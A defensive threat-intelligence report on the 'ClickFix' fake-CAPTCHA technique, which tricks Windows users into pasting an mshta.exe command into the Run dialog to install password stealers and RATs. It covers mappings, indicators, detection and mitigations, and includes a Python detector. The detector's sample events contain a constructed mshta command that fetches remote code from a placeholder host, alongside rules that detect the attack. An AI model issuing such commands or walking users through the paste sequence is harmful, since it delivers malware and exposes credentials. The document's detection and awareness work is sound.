Full Report
A clever malware deployment scheme first spotted in targeted attacks last year has now gone mainstream. In this scam, dubbed "ClickFix," the visitor to a hacked or malicious website is asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware.
Analysis Summary
# Tool/Technique: ClickFix
## Overview
ClickFix is a social engineering technique disguised as a CAPTCHA or verification test on compromised websites or via phishing emails. Its purpose is to trick users into executing a specific sequence of keyboard inputs that leverages built-in Windows functionality (`Win+R` and clipboard interaction) to download and execute password-stealing malware.
## Technical Details
- Type: Technique/Social Engineering Attack Pattern
- Platform: Microsoft Windows
- Capabilities: Exploits legitimate Windows functions (`mshta.exe`, Run command) via user interaction to achieve remote code execution and malware download.
- First Seen: Targeted attacks reported last year (2024).
## MITRE ATT&CK Mapping
Since ClickFix relies on user instruction to execute built-in features, the mapping focuses on the resulting execution methods:
- T1218 - System Binary Proxy Execution
- T1218.011 - Mshta
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell (Implied by Run command execution)
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Especially when delivered via HTML attachments)
## Functionality
### Core Capabilities
- **Deception:** Mimics "Verify You are a Human" tests or CAPTCHAs.
- **User Interaction Reliance:** Requires the user to perform three specific sequential key presses after clicking a deceptive button.
- **Run Command Invocation:** Uses the `Win + R` combination to open the Windows Run prompt.
- **Clipboard Injection:** Uses `CTRL + V` to paste malicious code supplied by the website's virtual clipboard into the Run prompt.
- **Execution via mshta.exe:** Executes the pasted command line using `mshta.exe`, which is used to run Microsoft HTML Application files. This results in the download and launch of various payloads (PowerShell, JavaScript, or PE files).
### Advanced Features
- **Payload Flexibility:** Capable of delivering a wide array of commodity malware families (those listed under Indicators of Compromise below), since the pasted `mshta.exe` command can fetch any payload the operator chooses.
- **Multi-vector Delivery:** Delivered via compromised websites, and via phishing emails using HTML attachments that spoof Microsoft Office error messages directing users to click a "Solution" button.
## Indicators of Compromise
- File Hashes: Not applicable to the technique itself, but related payloads include:
  - XWorm
  - Lumma stealer
  - VenomRAT
  - AsyncRAT
  - Danabot
  - NetSupport RAT
- File Names: Payloads may utilize PowerShell, JavaScript, or portable executable (PE) content.
- Registry Keys: Not specified.
- Network Indicators: Payload communication depends on the specific malware delivered (e.g., C2 traffic associated with XWorm, Lumma stealer, etc.).
- Behavioral Indicators:
  - Detection of sequential user input leading to Run prompt activation (`Win+R`).
  - Execution of `mshta.exe` with complex command-line arguments or parameters indicative of remote content loading.
  - Unexpected network connections originating from `mshta.exe`.
## Associated Threat Actors
Threat actors utilizing the ClickFix technique can be varied, leveraging it as a delivery mechanism for common malware kits. Specific mentions associated with the reported activity include:
- General cybercriminals targeting hospitality workers (impersonating Booking.com).
- Threat actors targeting the healthcare sector (leveraging compromised sites like HEP2go).
## Detection Methods
- **Signature-based detection:** Signatures for the specific commodity malware payloads (XWorm, Lumma, etc.) are crucial.
- **Behavioral detection:** Monitoring for the sequence of user actions that forms the execution chain (`Win+R`, then `CTRL+V` into the resulting Run prompt), and for anomalies involving `mshta.exe`, such as spawning network connections or downloading unexpected file types.
- **YARA rules:** Can be developed for the HTML attachments or the downloaded scripts/PE files.
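As an added example (not from the original report), a small Python detector that applies the behavioral indicators above to Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) events. The field names assume Sysmon conventions, the parent-process rule assumes that commands typed into the Run prompt are launched as children of `explorer.exe`, and the sample events are constructed.

```python
import json
import ntpath
import re

# Constructed Sysmon-style events (not real telemetry), newline-delimited JSON.
# EventID 1 = process creation, EventID 3 = network connection.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "mshta https://verify.example.invalid/captcha.hta"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "mshta C:\\Users\\u\\Downloads\\readme.hta"}
{"EventID": 3, "Image": "C:\\Windows\\System32\\mshta.exe", "DestinationIp": "203.0.113.5", "DestinationPort": 443}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad notes.txt"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Program Files\\App\\setup.exe", "CommandLine": "mshta C:\\Program Files\\App\\wizard.hta"}
"""

URL_RE = re.compile(r"https?://", re.IGNORECASE)  # remote content on the command line


def load_events(text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _basename(path):
    return ntpath.basename(path or "").lower()


def detect_clickfix(events):
    """Return one finding per indicator matched; every rule keys on mshta.exe (T1218.011)."""
    findings = []
    for ev in events:
        if _basename(ev.get("Image")) != "mshta.exe":
            continue
        if ev.get("EventID") == 3:
            dest = f"{ev.get('DestinationIp')}:{ev.get('DestinationPort')}"
            findings.append({"rule": "mshta-network-connection", "detail": dest})
            continue
        if ev.get("EventID") != 1:
            continue
        cmd = ev.get("CommandLine", "")
        if URL_RE.search(cmd):
            findings.append({"rule": "mshta-remote-content", "detail": cmd})
        if _basename(ev.get("ParentImage")) == "explorer.exe":
            # Assumption: Win+R launches are children of the shell, so an
            # explorer.exe parent matches the ClickFix execution chain.
            findings.append({"rule": "mshta-from-run-dialog", "detail": cmd})
    return findings


if __name__ == "__main__":
    for f in detect_clickfix(load_events(SAMPLE_EVENTS)):
        print(f"[{f['rule']}] {f['detail']}")
```

The fifth sample event (an installer launching a local `.hta`) is deliberately left unflagged to show that the rules key on the Run-dialog parent and remote content, not on `mshta.exe` alone.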
## Mitigation Strategies
- **Group Policy Restrictions:** Disable the functionality of the "Run" command when users hit the `Win + R` key combination.
- **User Education:** Train users, especially hospitality and healthcare workers, to recognize that standard CAPTCHAs do not require complex keypress sequences involving system commands, and to be wary of suspicious pop-ups on websites or in email attachments.
- **Application Control/Whitelisting:** Restrict the execution of potentially dangerous system binaries like `mshta.exe` from unexpected locations or command structures.
- **Email Security:** Enhance filtering for HTML attachments that display image content followed by apparent error messages urging user interaction.
## Related Tools/Techniques
- **Microsoft Office Macros:** The reliance on deceiving users into executing code via a layer of user interaction is reminiscent of older malicious macro campaigns.
- **Other legitimate Windows utilities:** Any technique that abuses built-in binaries (Living Off The Land Binaries - LOLBAS) to execute payloads, such as using `certutil.exe` or `regsvr32.exe`.